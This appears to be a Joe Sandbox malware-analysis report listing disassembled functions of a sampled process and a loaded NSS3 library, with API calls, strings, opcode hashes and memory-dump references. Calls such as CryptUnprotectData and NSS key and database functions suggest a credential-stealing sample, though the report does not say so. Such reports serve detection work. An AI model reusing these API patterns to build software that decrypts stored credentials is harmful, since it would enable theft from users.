NSS_SSL_REQUIRE_SAFE_NEGOTIATION, xrefs: 6BBC6FDB
NSS_SSL_CBC_RANDOM_IV, xrefs: 6BBC6FF8

Memory Dump Source

Source File: 00000001.00000002.2187866101.000000006BAB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6BAB0000, based on PE: true

Associated: 00000001.00000002.2187844571.000000006BAB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188024123.000000006BC4F000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188066570.000000006BC8E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188085985.000000006BC8F000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188104178.000000006BC90000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188121969.000000006BC95000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bab0000_u5mc.jbxd

Similarity

API ID: Secure$Value$Lockfclosefopenftellfwrite
String ID: NSS_SSL_CBC_RANDOM_IV$NSS_SSL_REQUIRE_SAFE_NEGOTIATION
API String ID: 3032383292-3007362596
Opcode ID: f46c47195f08e2258c8b0a6b0743a1d706643c9d443781de2a6248e4f3170857
Instruction ID: 4ed2ffc6b6e8daabc7855baafc2a3bae519dfbf1de7e0ba28b3a3e52f2f79fde
Opcode Fuzzy Hash: f46c47195f08e2258c8b0a6b0743a1d706643c9d443781de2a6248e4f3170857
Instruction Fuzzy Hash: 17711EB25485C5CBEB28FB2CC5A1D3637F1EB57B04B40022AD9578B295DB38A643C753

Uniqueness

Uniqueness Score: -1.00%

Function 00417B4E Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 00418E46
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00418E5B
UnhandledExceptionFilter.KERNEL32(0041C690), ref: 00418E66
GetCurrentProcess.KERNEL32(C0000409), ref: 00418E82
TerminateProcess.KERNEL32(00000000), ref: 00418E89

Memory Dump Source

Source File: 00000001.00000002.2124203765.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2124203765.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5mc.jbxd

Yara matches

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: 1485600a89bc27f1a0a21c1cb01dd845070ad6051d0655c0ebfcb599f372d5e6
Instruction ID: 5828a94612e18b022276c58097a982c86e574ee0b254963d5fd3238681fe770b
Opcode Fuzzy Hash: 1485600a89bc27f1a0a21c1cb01dd845070ad6051d0655c0ebfcb599f372d5e6
Instruction Fuzzy Hash: 2D21C274A01304EFC721EF54F944B843BB4FB8C309F91907AE64987260E7B456868F9D

Uniqueness

Uniqueness Score: -1.00%

Function 00406C10 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,00000400,?,?,?,?,?,`v@,80000001,h0A,?,?,?,?,?,00407660), ref: 00406C1D
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,`v@,80000001,h0A,?,?,?,?,?,00407660,?), ref: 00406C24
CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00406C51
WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000,?,?,?,?,?,`v@,80000001,h0A), ref: 00406C74
LocalFree.KERNEL32(?,?,?,?,?,?,`v@,80000001,h0A,?,?,?,?,?,00407660,?), ref: 00406C7E

Memory Dump Source

Source File: 00000001.00000002.2124203765.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2124203765.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5mc.jbxd

Yara matches

Similarity

API ID: Heap$AllocByteCharCryptDataFreeLocalMultiProcessUnprotectWide
String ID:
API String ID: 3657800372-0
Opcode ID: 325183e0ff294f6bc8ca0bae0d01f1e1eb9720b9252a7c44d145ca839e0966ea
Instruction ID: a62b9dfe9577ca48fe2f29d604933a8f18b811f44e231435f7e1fa1bbfb2df61
Opcode Fuzzy Hash: 325183e0ff294f6bc8ca0bae0d01f1e1eb9720b9252a7c44d145ca839e0966ea
Instruction Fuzzy Hash: 01011275A40708BBEB20DF94CD45F9E7779EB44B05F104155F706FB2C0D670AA118BA9

Uniqueness

Uniqueness Score: -1.00%

Function 6BB1E3B0 Relevance: 6.2, APIs: 4, Instructions: 233COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6BB1E4C8
sqlite3_free.NSS3(?), ref: 6BB1E645
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6BB1E697
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6BB1E6C8

Part of subcall function 6BABCA30: EnterCriticalSection.KERNEL32(?,?,?,6BB1F9C9,?,6BB1F4DA,6BB1F9C9,?,?,6BAE369A), ref: 6BABCA7A
Part of subcall function 6BABCA30: LeaveCriticalSection.KERNEL32(?), ref: 6BABCB26

Memory Dump Source

Source File: 00000001.00000002.2187866101.000000006BAB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6BAB0000, based on PE: true

Associated: 00000001.00000002.2187844571.000000006BAB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188024123.000000006BC4F000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188066570.000000006BC8E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188085985.000000006BC8F000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188104178.000000006BC90000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188121969.000000006BC95000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bab0000_u5mc.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$CriticalSection$EnterLeavesqlite3_free
String ID:
API String ID: 50423221-0
Opcode ID: 50a644bae35751ef6d025cfb8f2c4f0d55d54987e06f9290925762c063e2e175
Instruction ID: c4556d0d2c42e223982beb52438e77ef414f1f6af94762e0c54e4c7cf2a562bf
Opcode Fuzzy Hash: 50a644bae35751ef6d025cfb8f2c4f0d55d54987e06f9290925762c063e2e175
Instruction Fuzzy Hash: D291AB71A28A45CBEB18CF69C8947EFB7F1EF89304F14442DD46ADB650EB78A901CB40

Uniqueness

Uniqueness Score: -1.00%

Function 004094A0 Relevance: 6.1, APIs: 4, Instructions: 55encryptionmemoryCOMMON

Download Yara Rule

APIs

CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00404BAE,00000000,00000000), ref: 004094CF
LocalAlloc.KERNEL32(00000040,?,?,?,00404BAE,00000000,?), ref: 004094E1
CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00404BAE,00000000,00000000), ref: 0040950A
LocalFree.KERNEL32(?,?,?,?,00404BAE,00000000,?), ref: 0040951F

Memory Dump Source

Source File: 00000001.00000002.2124203765.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2124203765.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5mc.jbxd

Yara matches

Similarity

API ID: BinaryCryptLocalString$AllocFree
String ID:
API String ID: 4291131564-0
Opcode ID: eb8266b658b0a36e64dba83ee5fc04eec02a97dd996390432438c79c58cdc735
Instruction ID: 8ba321113e6e4d0cf3898c04bf9160a1f44f8cb9f34d86efd4b3c4bff5612467
Opcode Fuzzy Hash: eb8266b658b0a36e64dba83ee5fc04eec02a97dd996390432438c79c58cdc735
Instruction Fuzzy Hash: AA119074240308AFEB14CF64CC95FAA77B6FB89711F208059FA159B3D0C7B5AA41CB94

Uniqueness

Uniqueness Score: -1.00%

Function 6BC00B40 Relevance: 4.6, APIs: 3, Instructions: 92COMMON

Download Yara Rule

APIs

sqlite3_bind_int64.NSS3(?,?,?,?), ref: 6BC00B7C
sqlite3_bind_double.NSS3 ref: 6BC00BF1
sqlite3_bind_zeroblob.NSS3(?,?,00000000), ref: 6BC00C27

Memory Dump Source

Source File: 00000001.00000002.2187866101.000000006BAB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6BAB0000, based on PE: true

Associated: 00000001.00000002.2187844571.000000006BAB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188024123.000000006BC4F000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188066570.000000006BC8E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188085985.000000006BC8F000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188104178.000000006BC90000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188121969.000000006BC95000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bab0000_u5mc.jbxd

Similarity

API ID: sqlite3_bind_doublesqlite3_bind_int64sqlite3_bind_zeroblob
String ID:
API String ID: 4141409403-0
Opcode ID: 0608cb02b4dadc6ccd3b06d29b71b9e77b00e3f0c1c7475768a57ceefa6afa03
Instruction ID: 4ef806e19b3910e8cd8e4dddedf2369d431627b8dda7a4c544f2c298a442027f
Opcode Fuzzy Hash: 0608cb02b4dadc6ccd3b06d29b71b9e77b00e3f0c1c7475768a57ceefa6afa03
Instruction Fuzzy Hash: CC217B319585189FD7015F598C11D6A77BAFF87724F0A8295E8980B291FF3ADA01C392

Uniqueness

Uniqueness Score: -1.00%

Function 6BB743B0 Relevance: 1.6, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE00E,00000000), ref: 6BB7441E

Part of subcall function 6BB74050: PK11_ImportPublicKey.NSS3(00000000,?,00000000,?,?,?,?,?,?,?,6BB74410,?,-00000007,?,?,?), ref: 6BB740AA
Part of subcall function 6BB74050: TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,6BB74410), ref: 6BB740CF
Part of subcall function 6BB74050: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,6BB74410), ref: 6BB740E7
Part of subcall function 6BB74050: PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6BB74125
Part of subcall function 6BB74050: TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,6BB74410), ref: 6BB74143
Part of subcall function 6BB74050: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6BB74157

Memory Dump Source

Source File: 00000001.00000002.2187866101.000000006BAB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6BAB0000, based on PE: true

Associated: 00000001.00000002.2187844571.000000006BAB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188024123.000000006BC4F000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188066570.000000006BC8E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188085985.000000006BC8F000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188104178.000000006BC90000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188121969.000000006BC95000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bab0000_u5mc.jbxd

Similarity

API ID: CriticalEnterSectionValue$ErrorImportK11_PublicUnlock
String ID:
API String ID: 2263775716-0
Opcode ID: 957fce22fba346c840fb9e637c64ba8d5970d2c8e53e5adca6ce4517b86daa87
Instruction ID: 43cd19dded6709ea57e4e7c4c2406de2237ed849988426c5a1204262a4432a57
Opcode Fuzzy Hash: 957fce22fba346c840fb9e637c64ba8d5970d2c8e53e5adca6ce4517b86daa87
Instruction Fuzzy Hash: 5801C072E0022DABCF10DEA89C41AAF73B8EF0A708F404125E915B7200E7759E158BE1

Uniqueness

Uniqueness Score: -1.00%

Function 6BB48390 Relevance: 1.3, Strings: 1, Instructions: 5COMMON

Download Yara Rule

Strings

3.81, xrefs: 6BB48393

Memory Dump Source

Source File: 00000001.00000002.2187866101.000000006BAB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6BAB0000, based on PE: true

Associated: 00000001.00000002.2187844571.000000006BAB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188024123.000000006BC4F000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188066570.000000006BC8E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188085985.000000006BC8F000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188104178.000000006BC90000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188121969.000000006BC95000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bab0000_u5mc.jbxd

Similarity

API ID:
String ID: 3.81
API String ID: 0-3074973560
Opcode ID: f2018255984c53da5d0c0eadd304586ca2f3064f2306c3be9995434cda5c8ad7
Instruction ID: fec4dda116b7de1c2280c1004db9b34ec27b2176873e1387ffab8153c34056e9
Opcode Fuzzy Hash: f2018255984c53da5d0c0eadd304586ca2f3064f2306c3be9995434cda5c8ad7
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 6BB263C0 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2187866101.000000006BAB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6BAB0000, based on PE: true

Associated: 00000001.00000002.2187844571.000000006BAB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188024123.000000006BC4F000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188066570.000000006BC8E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188085985.000000006BC8F000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188104178.000000006BC90000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188121969.000000006BC95000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bab0000_u5mc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e88b9133a6b62132139cc6d1a575ec8ae7d8a74930fd2b39535c382beaba949b
Instruction ID: 236239e4da7bae41ab551da57a4374a3050b2c7e5bd08880b05f10381434f17e
Opcode Fuzzy Hash: e88b9133a6b62132139cc6d1a575ec8ae7d8a74930fd2b39535c382beaba949b
Instruction Fuzzy Hash: FEC04838244608CF9744EA09E48896437A8AF096117401094E9028BB21CA20FD51CA80

Uniqueness

Uniqueness Score: -1.00%

Function 0041952A Relevance: 129.2, APIs: 86, Instructions: 188COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0041953E

Part of subcall function 00417247: HeapFree.KERNEL32(00000000,00000000,?,00417158,00000000,00421AC0,0041719F,?,?,?,0041720F,00421AC0,?,?,00419FD3,00421AC0), ref: 0041725D
Part of subcall function 00417247: GetLastError.KERNEL32(?,?,00417158,00000000,00421AC0,0041719F,?,?,?,0041720F,00421AC0,?,?,00419FD3,00421AC0), ref: 0041726F

_free.LIBCMT ref: 00419546
_free.LIBCMT ref: 0041954E
_free.LIBCMT ref: 00419556
_free.LIBCMT ref: 0041955E
_free.LIBCMT ref: 00419566
_free.LIBCMT ref: 0041956D
_free.LIBCMT ref: 00419575
_free.LIBCMT ref: 0041957D
_free.LIBCMT ref: 00419585
_free.LIBCMT ref: 0041958D
_free.LIBCMT ref: 00419595
_free.LIBCMT ref: 0041959D
_free.LIBCMT ref: 004195A5
_free.LIBCMT ref: 004195AD
_free.LIBCMT ref: 004195B5
_free.LIBCMT ref: 004195C0
_free.LIBCMT ref: 004195C8
_free.LIBCMT ref: 004195D0
_free.LIBCMT ref: 004195D8
_free.LIBCMT ref: 004195E0
_free.LIBCMT ref: 004195E8
_free.LIBCMT ref: 004195F0
_free.LIBCMT ref: 004195F8
_free.LIBCMT ref: 00419600
_free.LIBCMT ref: 00419608
_free.LIBCMT ref: 00419610
_free.LIBCMT ref: 00419618
_free.LIBCMT ref: 00419620
_free.LIBCMT ref: 00419628
_free.LIBCMT ref: 00419630
_free.LIBCMT ref: 00419638
_free.LIBCMT ref: 00419646
_free.LIBCMT ref: 00419651
_free.LIBCMT ref: 0041965C
_free.LIBCMT ref: 00419667
_free.LIBCMT ref: 00419672
_free.LIBCMT ref: 0041967D
_free.LIBCMT ref: 00419688
_free.LIBCMT ref: 00419693
_free.LIBCMT ref: 0041969E
_free.LIBCMT ref: 004196A9
_free.LIBCMT ref: 004196B4
_free.LIBCMT ref: 004196BF
_free.LIBCMT ref: 004196CA
_free.LIBCMT ref: 004196D5
_free.LIBCMT ref: 004196E0
_free.LIBCMT ref: 004196EB
_free.LIBCMT ref: 004196F9
_free.LIBCMT ref: 00419704
_free.LIBCMT ref: 0041970F
_free.LIBCMT ref: 0041971A
_free.LIBCMT ref: 00419725
_free.LIBCMT ref: 00419730
_free.LIBCMT ref: 0041973B
_free.LIBCMT ref: 00419746
_free.LIBCMT ref: 00419751
_free.LIBCMT ref: 0041975C
_free.LIBCMT ref: 00419767
_free.LIBCMT ref: 00419772
_free.LIBCMT ref: 0041977D
_free.LIBCMT ref: 00419788
_free.LIBCMT ref: 00419793
_free.LIBCMT ref: 0041979E
_free.LIBCMT ref: 004197AC
_free.LIBCMT ref: 004197B7
_free.LIBCMT ref: 004197C2
_free.LIBCMT ref: 004197CD
_free.LIBCMT ref: 004197D8
_free.LIBCMT ref: 004197E3
_free.LIBCMT ref: 004197EE
_free.LIBCMT ref: 004197F9
_free.LIBCMT ref: 00419804
_free.LIBCMT ref: 0041980F
_free.LIBCMT ref: 0041981A
_free.LIBCMT ref: 00419825
_free.LIBCMT ref: 00419830
_free.LIBCMT ref: 0041983B
_free.LIBCMT ref: 00419846
_free.LIBCMT ref: 00419851
_free.LIBCMT ref: 0041985F
_free.LIBCMT ref: 0041986A
_free.LIBCMT ref: 00419875
_free.LIBCMT ref: 00419880
_free.LIBCMT ref: 0041988B
_free.LIBCMT ref: 00419896

Memory Dump Source

Source File: 00000001.00000002.2124203765.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2124203765.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5mc.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 55745e4d8ffa3bcd4bae6bd50e23aa08e34946fc70669168e917a1c48e4fa5ed
Instruction ID: 5df7b21d12798ad2dd02b2714939a7e9e3589bb161cd2ca89e36415dbd51ea28
Opcode Fuzzy Hash: 55745e4d8ffa3bcd4bae6bd50e23aa08e34946fc70669168e917a1c48e4fa5ed
Instruction Fuzzy Hash: AE71E331494B009BD7633B32DD03ADA7AB27F04304F10596EB1FB20632DA3678E79A59

Uniqueness

Uniqueness Score: -1.00%

Function 6BB46BF0 Relevance: 49.1, APIs: 19, Strings: 9, Instructions: 148COMMON

Download Yara Rule

APIs

PR_smprintf.NSS3(6BC80148,?,?,?,?,6BB46DC2), ref: 6BB46BFF
PR_smprintf.NSS3(%s manufacturerID='%s',00000000,?,6BB46DC2), ref: 6BB46C1C

Part of subcall function 6BB1C5E0: free.MOZGLUE(?,?,?,?,00000000,00000001,?,6BB21FBD,Unable to create nspr log file '%s',00000000), ref: 6BB1C63B

free.MOZGLUE(00000000,?,?,?,6BB46DC2), ref: 6BB46C27
PR_smprintf.NSS3(%s libraryDescription='%s',00000000,?,6BB46DC2), ref: 6BB46C45
free.MOZGLUE(00000000,?,?,?,6BB46DC2), ref: 6BB46C50
PR_smprintf.NSS3(%s cryptoTokenDescription='%s',00000000,?,6BB46DC2), ref: 6BB46C71
free.MOZGLUE(00000000,?,?,?,6BB46DC2), ref: 6BB46C7C
PR_smprintf.NSS3(%s dbTokenDescription='%s',00000000,?,6BB46DC2), ref: 6BB46C9D
free.MOZGLUE(00000000,?,?,?,6BB46DC2), ref: 6BB46CA8
PR_smprintf.NSS3(%s cryptoSlotDescription='%s',00000000,?,6BB46DC2), ref: 6BB46CC9
free.MOZGLUE(00000000,?,?,?,6BB46DC2), ref: 6BB46CD4
PR_smprintf.NSS3(%s dbSlotDescription='%s',00000000,?,6BB46DC2), ref: 6BB46CF5
free.MOZGLUE(00000000,?,?,?,6BB46DC2), ref: 6BB46D00
PR_smprintf.NSS3(%s FIPSSlotDescription='%s',00000000,?,6BB46DC2), ref: 6BB46D1D
free.MOZGLUE(00000000,?,?,?,6BB46DC2), ref: 6BB46D28
PR_smprintf.NSS3(%s FIPSTokenDescription='%s',00000000,?,6BB46DC2), ref: 6BB46D45
free.MOZGLUE(00000000,?,?,?,6BB46DC2), ref: 6BB46D50
PR_smprintf.NSS3(%s minPS=%d,00000000,?,6BB46DC2), ref: 6BB46D68
free.MOZGLUE(00000000,?,?,?,6BB46DC2), ref: 6BB46D73

Strings

%s cryptoTokenDescription='%s', xrefs: 6BB46C6C
%s minPS=%d, xrefs: 6BB46D63
%s libraryDescription='%s', xrefs: 6BB46C40
%s FIPSTokenDescription='%s', xrefs: 6BB46D40
%s dbSlotDescription='%s', xrefs: 6BB46CF0
%s cryptoSlotDescription='%s', xrefs: 6BB46CC4
%s FIPSSlotDescription='%s', xrefs: 6BB46D18
%s manufacturerID='%s', xrefs: 6BB46C17
%s dbTokenDescription='%s', xrefs: 6BB46C98

Memory Dump Source

Source File: 00000001.00000002.2187866101.000000006BAB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6BAB0000, based on PE: true

Associated: 00000001.00000002.2187844571.000000006BAB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188024123.000000006BC4F000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188066570.000000006BC8E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188085985.000000006BC8F000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188104178.000000006BC90000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188121969.000000006BC95000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bab0000_u5mc.jbxd

Similarity

API ID: R_smprintffree
String ID: %s FIPSSlotDescription='%s'$%s FIPSTokenDescription='%s'$%s cryptoSlotDescription='%s'$%s cryptoTokenDescription='%s'$%s dbSlotDescription='%s'$%s dbTokenDescription='%s'$%s libraryDescription='%s'$%s manufacturerID='%s'$%s minPS=%d
API String ID: 657075589-3414793728
Opcode ID: 7b4f976afaf487da47aca489d63c615bca9d21445668eb76a4e546799c469be7
Instruction ID: a9d78a563ef4e42f0f59e0bde863e428a97a87a876b29720eb5226a647103159
Opcode Fuzzy Hash: 7b4f976afaf487da47aca489d63c615bca9d21445668eb76a4e546799c469be7
Instruction Fuzzy Hash: 2641A6B760159227EB105A296C4ADAB3A5CFEC25D4B0901B0FC3EC7305FB19DE15A2F6

Uniqueness

Uniqueness Score: -1.00%

Function 6BB20AA0 Relevance: 45.7, APIs: 24, Strings: 2, Instructions: 227libraryCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE89D,00000000), ref: 6BB20AD4

Part of subcall function 6BBDC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6BBDC2BF

PR_EnterMonitor.NSS3 ref: 6BB20B0D
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 6BB20B2E
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 6BB20B54
WideCharToMultiByte.KERNEL32 ref: 6BB20B94
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 6BB20BC9
calloc.MOZGLUE(00000001,00000014), ref: 6BB20BEA
LoadLibraryExW.KERNEL32(?,00000000,?), ref: 6BB20C15

Strings

Loaded library %s (load lib), xrefs: 6BB20D6F
error %d, xrefs: 6BB20D08

Memory Dump Source

Source File: 00000001.00000002.2187866101.000000006BAB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6BAB0000, based on PE: true

Associated: 00000001.00000002.2187844571.000000006BAB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188024123.000000006BC4F000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188066570.000000006BC8E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188085985.000000006BC8F000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188104178.000000006BC90000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188121969.000000006BC95000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bab0000_u5mc.jbxd

Similarity

API ID: ByteCharMultiWide$EnterErrorLibraryLoadMonitorValuecalloc
String ID: Loaded library %s (load lib)$error %d
API String ID: 2139286163-2368894446
Opcode ID: 77e203aae5c0c40ff34cd6d357f0ee385e202f17fc51887412b7d6e6f82ffd02
Instruction ID: 956167367ec9af5414e864ce500957ed946212aa3fd1af296633d30f23351067
Opcode Fuzzy Hash: 77e203aae5c0c40ff34cd6d357f0ee385e202f17fc51887412b7d6e6f82ffd02
Instruction Fuzzy Hash: 8871D5B0D042509BEB109F39CC99B6B7BBCEB46754F40416AEC0ED6240EB78EB44CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6BB303C0 Relevance: 42.5, APIs: 23, Strings: 1, Instructions: 485stringmemoryCOMMON

Download Yara Rule

APIs

PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6BB303ED
PORT_ArenaAlloc_Util.NSS3(?,000007D1), ref: 6BB30415

Part of subcall function 6BB910C0: TlsGetValue.KERNEL32(?,6BB38802,00000000,00000008,?,6BB2EF74,00000000), ref: 6BB910F3
Part of subcall function 6BB910C0: EnterCriticalSection.KERNEL32(?,?,6BB38802,00000000,00000008,?,6BB2EF74,00000000), ref: 6BB9110C
Part of subcall function 6BB910C0: PL_ArenaAllocate.NSS3(?,?,?,6BB38802,00000000,00000008,?,6BB2EF74,00000000), ref: 6BB91141
Part of subcall function 6BB910C0: PR_Unlock.NSS3(?,?,?,6BB38802,00000000,00000008,?,6BB2EF74,00000000), ref: 6BB91182
Part of subcall function 6BB910C0: TlsGetValue.KERNEL32(?,6BB38802,00000000,00000008,?,6BB2EF74,00000000), ref: 6BB9119C

memset.VCRUNTIME140(00000000,00000000,000007D1), ref: 6BB3042E
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6BB304A6
tolower.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6BB304BD
tolower.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6BB304D8
CERT_DecodeAltNameExtension.NSS3(?,?), ref: 6BB30577
tolower.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6BB30681
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6BB306CB
tolower.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6BB306E5
